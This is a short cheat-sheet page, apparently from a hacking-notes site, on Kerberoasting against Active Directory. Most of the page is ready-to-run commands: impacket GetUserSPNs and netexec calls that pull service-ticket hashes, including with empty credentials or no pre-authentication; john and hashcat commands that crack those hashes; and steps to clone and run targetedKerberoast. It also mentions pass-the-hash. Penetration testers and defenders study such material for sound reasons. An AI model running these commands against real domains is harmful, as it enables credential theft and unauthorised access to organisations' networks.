# Kerberoasting Attack Kerberoasting is a attack technique against Kerberos with cracking passwords using a credential already gathered. ### Basic Attack If we have a password hash of a user, we might be able to find another user credential using the hash. ``` impacket-GetUserSPNs -hashes : example.local/username -outputfile hashes.txt # Without pre-authentication # -no-preauth: https://github.com/SecureAuthCorp/impacket/pull/1413 impacket-GetUserSPNs -no-preauth username -usersfile users.txt -dc-host example.local/ netexec ldap -u username -p password --kerberoasting output.txt netexec ldap -k --kerberoasting output.txt netexec ldap -u '' -p '' --kerberoasting output.txt ``` After finding hashes, we can crack it or use for pass-the-hash attack.\ To crack, run the following commands: ``` john --format=krb5tgs --wordlist=wordlist.txt hash.txt # or hashcat -m 13100 -a 0 hash.txt wordlist.txt # or hashcat -m 19600 -a 0 hash.txt wordlist.txt # or hashcat -m 19700 -a 0 hash.txt wordlist.txt ``` Note that we may need to modify the hash format a bit so that john or hashcat can recognize it. ### Get Hashes with TargetedKerberoast [TargetedKerberoast](https://github.com/ShutdownRepo/targetedKerberoast) is a Python script that can print kerberoast hashes for user accounts that have a SPN set. We can get the hashes for users in the target machine. ``` # (Optional) Sync datetime for the target machine sudo rdate -n example.com # or sudo ntpdate example.com # Execute targetedKerberoast to get the hash. git clone https://github.com/ShutdownRepo/targetedKerberoast cd targetedKerberoast python3 targetedKerberoast.py -d example.com -u 'username' -p 'password' ``` ### References * [The Hacker Recipes](https://www.thehacker.recipes/a-d/movement/kerberos/kerberoast) Back to top